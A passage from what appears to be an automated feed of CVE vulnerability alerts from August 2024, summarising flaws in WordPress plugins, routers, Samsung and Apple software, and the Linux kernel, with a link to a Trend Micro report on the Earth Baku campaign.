🚨 CVE-2024-43124Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Iqonic Design Graphina allows Stored XSS.This issue affects Graphina: from n/a through 1.8.10.🎖@cveNotify |
|
| 2024-08-12 23:37:25 |
🚨 CVE-2024-37924Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wp2speed WP2Speed Faster allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects WP2Speed Faster: from n/a through 1.0.1.🎖@cveNotify |
|
| 2024-08-12 23:37:24 |
🚨 CVE-2024-35775Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting'), Improper Authentication vulnerability in Soliloquy Team Slider by Soliloquy allows Cross-Site Scripting (XSS).This issue affects Slider by Soliloquy: from n/a through 2.7.6.🎖@cveNotify |
|
| 2024-08-12 22:37:32 |
🚨 CVE-2024-43161Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Averta Depicter Slider allows Stored XSS.This issue affects Depicter Slider: from n/a through 3.1.2.🎖@cveNotify |
|
| 2024-08-12 22:37:26 |
🚨 CVE-2024-43156Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in AddonMaster Post Grid Master allows Reflected XSS.This issue affects Post Grid Master: from n/a through 3.4.10.🎖@cveNotify |
|
| 2024-08-12 22:37:25 |
🚨 CVE-2024-43151Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Brainstorm Force Ultimate Addons for Beaver Builder – Lite allows Stored XSS.This issue affects Ultimate Addons for Beaver Builder – Lite: from n/a through 1.5.9.🎖@cveNotify |
|
| 2024-08-12 22:37:24 |
🚨 CVE-2023-7066The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted PDF files. This could allow an attacker to execute code in the context of the current process.🎖@cveNotify |
|
| 2024-08-12 21:37:25 |
🚨 CVE-2024-22182A remote, unauthenticated attacker may be able to send crafted messages to the web server of the Commend WS203VICM causing the system to restart, interrupting service.🎖@cveNotify |
|
| 2024-08-12 21:37:24 |
🚨 CVE-2024-21767A remote attacker may be able to bypass access control of Commend WS203VICM by creating a malicious request.🎖@cveNotify |
|
| 2024-08-12 20:37:32 |
🚨 CVE-2023-48171An issue in OWASP DefectDojo before v.1.5.3.1 allows a remote attacker to escalate privileges via the user permissions component.🎖@cveNotify |
|
| 2024-08-12 20:37:25 |
🚨 CVE-2024-29946In Splunk Enterprise versions below 9.2.1, 9.1.4, and 9.0.9, the Dashboard Examples Hub lacks protections for risky SPL commands. This could let attackers bypass SPL safeguards for risky commands in the Hub. The vulnerability would require the attacker to phish the victim by tricking them into initiating a request within their browser.🎖@cveNotify |
|
| 2024-08-12 20:37:24 |
🚨 CVE-2024-28212nGrinder before 3.5.9 uses old version of SnakeYAML, which could allow remote attacker to execute arbitrary code via unsafe deserialization.🎖@cveNotify |
|
| 2024-08-12 19:47:28 |
A Dive into Earth Baku’s Latest Campaign | Trend Micro (US)Since late 2022, Earth Baku has broadened its scope from the Indo-Pacific region to Europe, the Middle East, and Africa. Their latest operations demonstrate sophisticated techniques, such as exploiting public-facing applications like IIS servers for initial access and deploying the Godzilla webshell for command and control.https://www.trendmicro.com/en_us/research/24/h/earth-baku-latest-campaign.html🎖@malwr |
|
| 2024-08-12 19:37:35 |
🚨 CVE-2024-6768A Denial of Service in CLFS.sys in Microsoft Windows 10, Windows 11, Windows Server 2016, Windows Server 2019, and Windows Server 2022 allows a malicious authenticated low-privilege user to cause a Blue Screen of Death via a forced call to the KeBugCheckEx function.🎖@cveNotify |
|
| 2024-08-12 19:37:32 |
🚨 CVE-2024-42547TOTOLINK A3100R V4.1.2cu.5050_B20200504 has a buffer overflow vulnerability in the http_host parameter in the loginauth function.🎖@cveNotify |
|
| 2024-08-12 19:37:31 |
🚨 CVE-2024-40893Multiple authenticated operating system (OS) command injection vulnerabilities exist in Firewalla Box Software versions before 1.979. A physically close attacker that is authenticated to the Bluetooth Low-Energy (BTLE) interface can use the network configuration service to inject commands in various configuration parameters including networkConfig.Interface.Phy.Eth0.Extra.PingTestIP, networkConfig.Interface.Phy.Eth0.Extra.DNSTestDomain, and networkConfig.Interface.Phy.Eth0.Gateway6. Additionally, because the configuration can be synced to the Firewalla cloud, the attacker may be able to persist access even after hardware resets and firmware re-flashes.🎖@cveNotify |
|
| 2024-08-12 19:37:30 |
🚨 CVE-2024-40892A weak credential vulnerability exists in Firewalla Box Software versions before 1.979. This vulnerability allows a physically close attacker to use the license UUID for authentication and provision SSH credentials over the Bluetooth Low-Energy (BTLE) interface. Once an attacker gains access to the LAN, they could log into the SSH interface using the provisioned credentials. The license UUID can be acquired through plain-text Bluetooth sniffing, reading the QR code on the bottom of the device, or brute-forcing the UUID (though this is less likely).🎖@cveNotify |
|
| 2024-08-12 19:37:26 |
🚨 CVE-2024-39930The built-in SSH server of Gogs through 0.13.0 allows argument injection in internal/ssh/ssh.go, leading to remote code execution. Authenticated attackers can exploit this by opening an SSH connection and sending a malicious --split-string env request if the built-in SSH server is activated. Windows installations are unaffected.🎖@cveNotify |
|
| 2024-08-12 19:37:25 |
🚨 CVE-2024-3406The WP Prayer WordPress plugin through 2.0.9 does not have CSRF check in place when updating its email settings, which could allow attackers to make a logged in admin change them via a CSRF attack🎖@cveNotify |
|
| 2024-08-12 19:37:24 |
🚨 CVE-2024-2400Use after free in Performance Manager in Google Chrome prior to 122.0.6261.128 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-08-12 19:07:42 |
🚨 CVE-2024-34619Improper input validation in librtp.so prior to SMR Aug-2024 Release 1 allows remote attackers to execute arbitrary code with system privilege. User interaction is required for triggering this vulnerability.🎖@cveNotify |
|
| 2024-08-12 19:07:41 |
🚨 CVE-2024-34616Improper handling of insufficient permission in KnoxDualDARPolicy prior to SMR Aug-2024 Release 1 allows local attackers to access sensitive data.🎖@cveNotify |
|
| 2024-08-12 19:07:40 |
🚨 CVE-2024-34615Out-of-bound write in libsmat.so prior to SMR Aug-2024 Release 1 allows local attackers to cause memory corruption.🎖@cveNotify |
|
| 2024-08-12 19:07:37 |
🚨 CVE-2024-34614Out-of-bound write in libsmat.so prior to SMR Aug-2024 Release 1 allows local attackers to execute arbitrary code.🎖@cveNotify |
|
| 2024-08-12 19:07:36 |
🚨 CVE-2024-34611Improper access control in KnoxService prior to SMR Aug-2024 Release 1 allows local attackers to get sensitive information.🎖@cveNotify |
|
| 2024-08-12 19:07:35 |
🚨 CVE-2024-34610Improper access control in ExtControlDeviceService prior to SMR Aug-2024 Release 1 allows local attackers to access protected data.🎖@cveNotify |
|
| 2024-08-12 19:07:31 |
🚨 CVE-2024-7502A crafted DPA file could force Delta Electronics DIAScreen to overflow a stack-based buffer, which could allow an attacker to execute arbitrary code.🎖@cveNotify |
|
| 2024-08-12 19:07:30 |
🚨 CVE-2024-39229An issue in GL-iNet products AR750/AR750S/AR300M/AR300M16/MT300N-V2/B1300/MT1300/SFT1200/X750 v4.3.11, MT3000/MT2500/AXT1800/AX1800/A1300/X300B v4.5.16, XE300 v4.3.16, E750 v4.3.12, AP1300/S1300 v4.3.13, XE3000/X3000 v4, and B2200/MV1000/MV1000W/USB150/N300/SF1200 v3.216 allows attackers to intercept communications via a man-in-the-middle attack when DDNS clients are reporting data to the server.🎖@cveNotify |
|
| 2024-08-12 19:07:26 |
🚨 CVE-2024-31203A “CWE-121: Stack-based Buffer Overflow” in the wd210std.dll dynamic library packaged with the ThermoscanIP installer allows a local attacker to possibly trigger a Denial-of-Service (DoS) condition on the target component.🎖@cveNotify |
|
| 2024-08-12 19:07:25 |
🚨 CVE-2024-31201A “CWE-428: Unquoted Search Path or Element” affects the ThermoscanIP_Scrutation service. Such misconfiguration could be abused in scenarios where incorrect permissions were assigned to the C:\ path to attempt a privilege escalation on the local machine.🎖@cveNotify |
|
| 2024-08-12 18:07:26 |
🚨 CVE-2024-7285A vulnerability has been found in SourceCodester Establishment Billing Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /admin/ajax.php?action=save_settings. The manipulation of the argument name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-273154 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-12 17:07:25 |
🚨 CVE-2024-7303A vulnerability was found in itsourcecode Online Blood Bank Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /request.php of the component Send Blood Request Page. The manipulation of the argument Address/bloodgroup leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273185 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-12 17:07:24 |
🚨 CVE-2024-6966A vulnerability was found in itsourcecode Online Blood Bank Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file login.php of the component Login. The manipulation of the argument user/pass leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272120.🎖@cveNotify |
|
| 2024-08-12 16:37:30 |
🚨 CVE-2024-33895Cosy+ devices running a firmware 21.x below 21.2s10 or a firmware 22.x below 22.1s3 use a unique key to encrypt the configuration parameters. This is fixed in version 21.2s10 and 22.1s3, the key is now unique per device.🎖@cveNotify |
|
| 2024-08-12 16:37:29 |
🚨 CVE-2024-33894Insecure Permission vulnerability in Cosy+ devices running a firmware 21.x below 21.2s10 or a firmware 22.x below 22.1s3 are executing several processes with elevated privileges.🎖@cveNotify |
|
| 2024-08-12 16:37:26 |
🚨 CVE-2024-33893Cosy+ devices running a firmware 21.x below 21.2s10 or a firmware 22.x below 22.1s3 are vulnerable to XSS when displaying the logs due to improper input sanitization. This is fixed in version 21.2s10 and 22.1s3.🎖@cveNotify |
|
| 2024-08-12 16:37:25 |
🚨 CVE-2024-35162Path traversal vulnerability exists in Download Plugins and Themes from Dashboard versions prior to 1.8.6. If this vulnerability is exploited, a remote authenticated attacker with "switch_themes" privilege may obtain arbitrary files on the server.🎖@cveNotify |
|
| 2024-08-12 16:37:24 |
🚨 CVE-2024-4871A vulnerability was found in Satellite. When running a remote execution job on a host, the host's SSH key is not being checked. When the key changes, the Satellite still connects it because it uses "-o StrictHostKeyChecking=no". This flaw can lead to a man-in-the-middle attack (MITM), denial of service, leaking of secrets the remote execution job contains, or other issues that may arise from the attacker's ability to forge an SSH key. This issue does not directly allow unauthorized remote execution on the Satellite, although it can leak secrets that may lead to it.🎖@cveNotify |
|
| 2024-08-12 16:07:32 |
🚨 CVE-2024-23261A logic issue was addressed with improved state management. This issue is fixed in macOS Monterey 12.7.6, macOS Sonoma 14.4, macOS Ventura 13.6.8. An attacker may be able to read information belonging to another user.🎖@cveNotify |
|
| 2024-08-12 16:07:31 |
🚨 CVE-2023-42957A permissions issue was addressed with additional restrictions. This issue is fixed in iOS 17 and iPadOS 17, macOS Sonoma 14, watchOS 10. An app may be able to read sensitive location information.🎖@cveNotify |
|
| 2024-08-12 16:07:28 |
🚨 CVE-2023-42949This issue was addressed with improved data protection. This issue is fixed in iOS 17 and iPadOS 17, macOS Sonoma 14, watchOS 10, tvOS 17. An app may be able to access edited photos saved to a temporary directory.🎖@cveNotify |
|
| 2024-08-12 16:07:27 |
🚨 CVE-2023-42948This issue was addressed through improved state management. This issue is fixed in macOS Sonoma 14. A Wi-Fi password may not be deleted when activating a Mac in macOS Recovery.🎖@cveNotify |
|
| 2024-08-12 16:07:26 |
🚨 CVE-2023-42943A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14. An app may be able to read sensitive location information.🎖@cveNotify |
|
| 2024-08-12 16:07:25 |
🚨 CVE-2023-42925The issue was addressed with improved restriction of data container access. This issue is fixed in iOS 17 and iPadOS 17, macOS Sonoma 14. An app may be able to access Notes attachments.🎖@cveNotify |
|
| 2024-08-12 16:07:24 |
🚨 CVE-2023-40398This issue was addressed with improved checks. This issue is fixed in macOS Monterey 12.6.4, macOS Big Sur 11.7.5, macOS Ventura 13.3, iOS 16.4 and iPadOS 16.4. A sandboxed process may be able to circumvent sandbox restrictions.🎖@cveNotify |
|
| 2024-08-12 15:37:43 |
🚨 CVE-2024-42258In the Linux kernel, the following vulnerability has been resolved:mm: huge_memory: use !CONFIG_64BIT to relax huge page alignment on 32 bit machinesYves-Alexis Perez reported commit 4ef9ad19e176 ("mm: huge_memory: don'tforce huge page alignment on 32 bit") didn't work for x86_32 [1]. It isbecause x86_32 uses CONFIG_X86_32 instead of CONFIG_32BIT.!CONFIG_64BIT should cover all 32 bit machines.[1] https://lore.kernel.org/linux-mm/CAHbLzkr1LwH3pcTgM+aGQ31ip2bKqiqEQ8=FQB+t2c3dhNKNHA@mail.gmail.com/🎖@cveNotify |
|
| 2024-08-12 15:37:42 |
🚨 CVE-2024-33535An issue was discovered in Zimbra Collaboration (ZCS) 9.0 and 10.0. The vulnerability involves unauthenticated local file inclusion (LFI) in a web application, specifically impacting the handling of the packages parameter. Attackers can exploit this flaw to include arbitrary local files without authentication, potentially leading to unauthorized access to sensitive information. The vulnerability is limited to files within a specific directory.🎖@cveNotify |
|
| 2024-08-12 15:37:38 |
🚨 CVE-2024-33533An issue was discovered in Zimbra Collaboration (ZCS) 9.0 and 10.0, issue 1 of 2. A reflected cross-site scripting (XSS) vulnerability has been identified in the Zimbra webmail admin interface. This vulnerability occurs due to inadequate input validation of the packages parameter, allowing an authenticated attacker to inject and execute arbitrary JavaScript code within the context of another user's browser session. By uploading a malicious JavaScript file and crafting a URL containing its location in the packages parameter, the attacker can exploit this vulnerability. Subsequently, when another user visits the crafted URL, the malicious JavaScript code is executed.🎖@cveNotify |
|
| 2024-08-12 15:37:37 |
🚨 CVE-2024-21550SteVe is an open platform that implements different version of the OCPP protocol for Electric Vehicle charge points, acting as a central server for management of registered charge points. Attackers can inject arbitrary HTML and Javascript code via WebSockets leading to persistent Cross-Site Scripting in the SteVe management interface.🎖@cveNotify |
|
| 2024-08-12 15:37:36 |
🚨 CVE-2024-7697Logical vulnerability in the mobile application (com.transsion.carlcare) may lead to user information leakage risks.🎖@cveNotify |
|
| 2024-08-12 15:37:32 |
🚨 CVE-2024-42357Shopware is an open commerce platform. Prior to versions 6.6.5.1 and 6.5.8.13, the Shopware application API contains a search functionality which enables users to search through information stored within their Shopware instance. The searches performed by this function can be aggregated using the parameters in the `aggregations` object. The `name` field in this `aggregations` object is vulnerable SQL-injection and can be exploited using SQL parameters. Update to Shopware 6.6.5.1 or 6.5.8.13 to receive a patch. For older versions of 6.1, 6.2, 6.3, and 6.4, corresponding security measures are also available via a plugin.🎖@cveNotify |
|
| 2024-08-12 15:07:30 |
🚨 CVE-2024-6639The MDx theme for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mdx_list_item' shortcode in all versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-12 15:07:26 |
🚨 CVE-2024-27873An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in iOS 16.7.9 and iPadOS 16.7.9, macOS Ventura 13.6.8, macOS Monterey 12.7.6, iOS 17.6 and iPadOS 17.6, macOS Sonoma 14.6. Processing a maliciously crafted video file may lead to unexpected app termination.🎖@cveNotify |
|
| 2024-08-12 15:07:25 |
🚨 CVE-2024-27871A path handling issue was addressed with improved validation. This issue is fixed in macOS Sonoma 14.6, iOS 17.6 and iPadOS 17.6. An app may be able to access protected user data.🎖@cveNotify |
|
| 2024-08-12 15:07:24 |
🚨 CVE-2024-27863An information disclosure issue was addressed with improved private data redaction for log entries. This issue is fixed in iOS 17.6 and iPadOS 17.6, watchOS 10.6, tvOS 17.6, visionOS 1.3, macOS Sonoma 14.6. A local attacker may be able to determine kernel memory layout.🎖@cveNotify |
|
| 2024-08-12 14:37:45 |
🚨 CVE-2024-6639The MDx theme for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mdx_list_item' shortcode in all versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-12 14:37:44 |
🚨 CVE-2024-42010mod_css_styles in Roundcube through 1.5.7 and 1.6.x through 1.6.7 insufficiently filters Cascading Style Sheets (CSS) token sequences in rendered e-mail messages, allowing a remote attacker to obtain sensitive information.🎖@cveNotify |
|
| 2024-08-12 14:37:43 |
🚨 CVE-2024-7199A vulnerability classified as critical was found in SourceCodester Complaints Report Management System 1.0. This vulnerability affects unknown code of the file /admin/manage_user.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272620.🎖@cveNotify |
|
| 2024-08-12 14:37:39 |
🚨 CVE-2024-7197A vulnerability was found in SourceCodester Complaints Report Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/manage_complaint.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-272618 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-12 14:37:38 |
🚨 CVE-2024-7195A vulnerability was found in itsourcecode Society Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/check_admin.php. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272616.🎖@cveNotify |
|
| 2024-08-12 14:37:37 |
🚨 CVE-2024-7194A vulnerability was found in itsourcecode Society Management System 1.0 and classified as critical. This issue affects some unknown processing of the file check_student.php. The manipulation of the argument student_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272615.🎖@cveNotify |
|
| 2024-08-12 14:37:33 |
🚨 CVE-2024-7169A vulnerability classified as problematic has been found in SourceCodester School Fees Payment System 1.0. This affects an unknown part of the file /ajax.php. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272583.🎖@cveNotify |
|
| 2024-08-12 14:37:32 |
🚨 CVE-2024-7168A vulnerability was found in SourceCodester School Fees Payment System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /manage_user.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-272582 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-12 14:37:31 |
🚨 CVE-2024-7166A vulnerability was found in SourceCodester School Fees Payment System 1.0. It has been classified as critical. Affected is an unknown function of the file /receipt.php. The manipulation of the argument ef_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272580.🎖@cveNotify |
|
| 2024-08-12 13:07:24 |
🚨 CVE-2024-43199Nagios NDOUtils before 2.1.4 allows privilege escalation from nagios to root because certain executable files are owned by the nagios user.🎖@cveNotify |
|
| 2024-08-10 16:37:25 |
🚨 CVE-2023-46935eyoucms v1.6.4 is vulnerable Cross Site Scripting (XSS), which can lead to stealing sensitive information of logged-in users.🎖@cveNotify |
|
| 2024-08-10 16:37:24 |
🚨 CVE-2023-40809OpenCRX version 5.2.0 is vulnerable to HTML injection via the Activity Search Criteria-Activity Number.🎖@cveNotify |
|
| 2024-08-09 21:37:30 |
🚨 CVE-2024-34634Out-of-bounds read in parsing connected object list in Samsung Notes prior to version 4.4.21.62 allows local attacker to access unauthorized memory.🎖@cveNotify |
|
| 2024-08-09 21:37:29 |
🚨 CVE-2024-34633Out-of-bounds read in parsing object header in Samsung Notes prior to version 4.4.21.62 allows local attacker to access unauthorized memory.🎖@cveNotify |
|
| 2024-08-09 21:37:26 |
🚨 CVE-2024-23772An issue was discovered in Quest KACE Agent for Windows 12.0.38 and 13.1.23.0. An Arbitrary file create vulnerability exists in the KSchedulerSvc.exe, KUserAlert.exe, and Runkbot.exe components. This allows local attackers to create any file of their choice with NT Authority\SYSTEM privileges.🎖@cveNotify |
|
| 2024-08-09 21:37:25 |
🚨 CVE-2024-27521TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain an unauthenticated remote command execution (RCE) vulnerability via multiple parameters in the "setOpModeCfg" function. This security issue allows an attacker to take complete control of the device. In detail, exploitation allows unauthenticated, remote attackers to execute arbitrary system commands with administrative privileges (i.e., as user "root").🎖@cveNotify |
|
| 2024-08-09 21:37:24 |
🚨 CVE-2023-6585The WP JobSearch WordPress plugin before 2.3.4 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server🎖@cveNotify |
|
| 2024-08-09 21:07:32 |
🚨 CVE-2024-34628Out-of-bounds read in applying binary with path in Samsung Notes prior to version 4.4.21.62 allows local attackers to potentially read memory.🎖@cveNotify |
|
| 2024-08-09 21:07:26 |
🚨 CVE-2024-34627Out-of-bounds read in parsing implemention in Samsung Notes prior to version 4.4.21.62 allows local attackers to potentially read memory.🎖@cveNotify |
|
| 2024-08-09 21:07:25 |
🚨 CVE-2024-34624Out-of-bounds read in applying paragraphs in Samsung Notes prior to version 4.4.21.62 allows local attackers to potentially read memory.🎖@cveNotify |
|
| 2024-08-09 21:07:24 |
🚨 CVE-2024-34621Out-of-bounds read in applying binary with data in Samsung Notes prior to version 4.4.21.62 allows local attackers to potentially read memory.🎖@cveNotify |
|
| 2024-08-09 20:37:32 |
🚨 CVE-2024-2429The Salon booking system WordPress plugin through 9.6.5 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack🎖@cveNotify |
|
| 2024-08-09 20:37:25 |
🚨 CVE-2024-1232The CM Download Manager WordPress plugin before 2.9.0 does not have CSRF checks in some places, which could allow attackers to make logged in admins delete downloads via a CSRF attack🎖@cveNotify |
|
| 2024-08-09 20:37:24 |
🚨 CVE-2019-16572Jenkins Weibo Plugin 1.0.1 and earlier stores credentials unencrypted in its global configuration file on the Jenkins master where they can be viewed by users with access to the master file system.🎖@cveNotify |
|
| 2024-08-09 20:07:25 |
🚨 CVE-2024-34688Due to unrestricted access to the Meta ModelRepository services in SAP NetWeaver AS Java, attackers can perform DoS attackson the application, which may prevent legitimate users from accessing it. Thiscan result in no impact on confidentiality and integrity but a high impact onthe availability of the application.🎖@cveNotify |
|
| 2024-08-09 20:07:24 |
🚨 CVE-2024-34683An authenticated attacker can upload maliciousfile to SAP Document Builder service. When the victim accesses this file, theattacker is allowed to access, modify, or make the related informationunavailable in the victim’s browser.🎖@cveNotify |
|
| 2024-08-09 19:37:32 |
🚨 CVE-2024-0151Insufficient argument checking in Secure state Entry functions in software using Cortex-M Security Extensions (CMSE), that has been compiled using toolchains that implement 'Arm v8-M Security Extensions Requirements on Development Tools' prior to version 1.4, allows an attacker to pass values to Secure state that are out of range for types smaller than 32-bits. Out of range values might lead to incorrect operations in secure state.🎖@cveNotify |
|
| 2024-08-09 19:37:26 |
🚨 CVE-2024-2404The Better Comments WordPress plugin before 1.5.6 does not sanitise and escape some of its settings, which could allow low privilege users such as Subscribers to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2024-08-09 19:37:25 |
🚨 CVE-2024-0719The Tabs Shortcode and Widget WordPress plugin through 1.17 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-08-09 19:37:24 |
🚨 CVE-2023-7165The JetBackup WordPress plugin before 2.0.9.9 doesn't use index files to prevent public directory listing of sensitive directories in certain configurations, which allows malicious actors to leak backup files.🎖@cveNotify |
|
| 2024-08-09 19:07:32 |
🚨 CVE-2024-32865Under certain circumstances the exacqVision Server will not properly validate TLS certificates provided by connected devices.🎖@cveNotify |
|
| 2024-08-09 19:07:25 |
🚨 CVE-2024-32863Under certain circumstances the exacqVision Web Services may be susceptible to Cross-Site Request Forgery (CSRF)🎖@cveNotify |
|
| 2024-08-09 19:07:24 |
🚨 CVE-2024-37176SAP BW/4HANA Transformation and Data TransferProcess (DTP) allows an authenticated attacker to gain higher access levelsthan they should have by exploiting improper authorization checks. This resultsin escalation of privileges. It has no impact on the confidentiality of databut may have low impacts on the integrity and availability of the application.🎖@cveNotify |
|
| 2024-08-09 18:37:24 |
🚨 CVE-2024-41949biscuit-rust is the Rust implementation of Biscuit, an authentication and authorization token for microservices architectures. Third-party blocks can be generated without transferring the whole token to the third-party authority. Instead, a ThirdPartyBlock request can be sent, providing only the necessary info to generate a third-party block and to sign it, which includes the public key of the previous block (used in the signature) and the public keys part of the token symbol table (for public key interning in datalog expressions). A third-part block request forged by a malicious user can trick the third-party authority into generating datalog trusting the wrong keypair.🎖@cveNotify |
|
| 2024-08-09 17:07:25 |
🚨 CVE-2024-27877The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.6, macOS Monterey 12.7.6, macOS Ventura 13.6.8. Processing a maliciously crafted file may lead to a denial-of-service or potentially disclose memory contents.🎖@cveNotify |
|
| 2024-08-09 17:07:24 |
🚨 CVE-2024-37334Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-09 16:37:31 |
🚨 CVE-2023-40261Diebold Nixdorf Vynamic Security Suite (VSS) before 3.3.0 SR17, 4.0.0 SR07, 4.1.0 SR04, 4.2.0 SR04, and 4.3.0 SR03 fails to validate file attributes during the Pre-Boot Authorization (PBA) process. This can be exploited by a physical attacker who is able to manipulate the contents of the system's hard disk.🎖@cveNotify |
|
| 2024-08-09 16:37:30 |
🚨 CVE-2024-6892Attackers can craft a malicious link that once clicked will execute arbitrary JavaScript in the context of the Journyx web application.🎖@cveNotify |
|
| 2024-08-09 16:37:26 |
🚨 CVE-2024-23270The issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.7.4, macOS Ventura 13.6.5, macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4, tvOS 17.4. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2024-08-09 16:37:25 |
🚨 CVE-2023-42838An access issue was addressed with improvements to the sandbox. This issue is fixed in macOS Ventura 13.6.3, macOS Sonoma 14.1, macOS Monterey 12.7.2. An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges.🎖@cveNotify |
|
| 2024-08-09 16:37:24 |
🚨 CVE-2024-23788Server-side request forgery vulnerability in Energy Management Controller with Cloud Services JH-RVB1 /JH-RV11 Ver.B0.1.9.1 and earlier allows a network-adjacent unauthenticated attacker to send an arbitrary HTTP request (GET) from the affected product.🎖@cveNotify |
|
| 2024-08-09 15:37:31 |
🚨 CVE-2024-7450A vulnerability has been found in itsourcecode Placement Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /resume_upload.php of the component Image Handler. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273541 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-09 15:37:30 |
🚨 CVE-2024-7446A vulnerability, which was classified as critical, was found in itsourcecode Ticket Reservation System 1.0. This affects an unknown part of the file list_tickets.php. The manipulation of the argument prefSeat_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273531.🎖@cveNotify |
|
| 2024-08-09 15:37:26 |
🚨 CVE-2024-30973An issue in V-SOL G/EPON ONU HG323AC-B with firmware version V2.0.08-210715 allows an attacker to execute arbtirary code and obtain sensitive information via crafted POST request to /boaform/getASPdata/formFirewall, /boaform/getASPdata/formAcc.🎖@cveNotify |
|
| 2024-08-09 15:37:25 |
🚨 CVE-2024-24246Heap Buffer Overflow vulnerability in qpdf 11.9.0 allows attackers to crash the application via the std::__shared_count() function at /bits/shared_ptr_base.h.🎖@cveNotify |
|
| 2024-08-09 15:37:24 |
🚨 CVE-2024-25770libming 0.4.8 contains a memory leak vulnerability in /libming/src/actioncompiler/listaction.c.🎖@cveNotify |
|
| 2024-08-09 15:07:26 |
🚨 CVE-2024-40722The specific API in TCBServiSign Windows Version from CHANGING Information Technology does does not properly validate the length of server-side input. When a user visits a spoofed website, unauthenticated remote attackers can cause a stack-based buffer overflow in the TCBServiSign, temporarily disrupting its service.🎖@cveNotify |
|
| 2024-08-09 15:07:25 |
🚨 CVE-2024-7336A vulnerability classified as critical was found in TOTOLINK EX200 4.0.3c.7646_B20201211. Affected by this vulnerability is the function loginauth of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument http_host leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273259. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-09 15:07:24 |
🚨 CVE-2024-42152In the Linux kernel, the following vulnerability has been resolved:nvmet: fix a possible leak when destroy a ctrl during qp establishmentIn nvmet_sq_destroy we capture sq->ctrl early and if it is non-NULL weknow that a ctrl was allocated (in the admin connect request handler)and we need to release pending AERs, clear ctrl->sqs and sq->ctrl(for nvme-loop primarily), and drop the final reference on the ctrl.However, a small window is possible where nvmet_sq_destroy starts (asa result of the client giving up and disconnecting) concurrently withthe nvme admin connect cmd (which may be in an early stage). But *before*kill_and_confirm of sq->ref (i.e. the admin connect managed to get an sqlive reference). In this case, sq->ctrl was allocated however after it wascaptured in a local variable in nvmet_sq_destroy.This prevented the final reference drop on the ctrl.Solve this by re-capturing the sq->ctrl after all inflight request hascompleted, where for sure sq->ctrl reference is final, and move forwardbased on that.This issue was observed in an environment with many hosts connectingmultiple ctrls simoutanuosly, creating a delay in 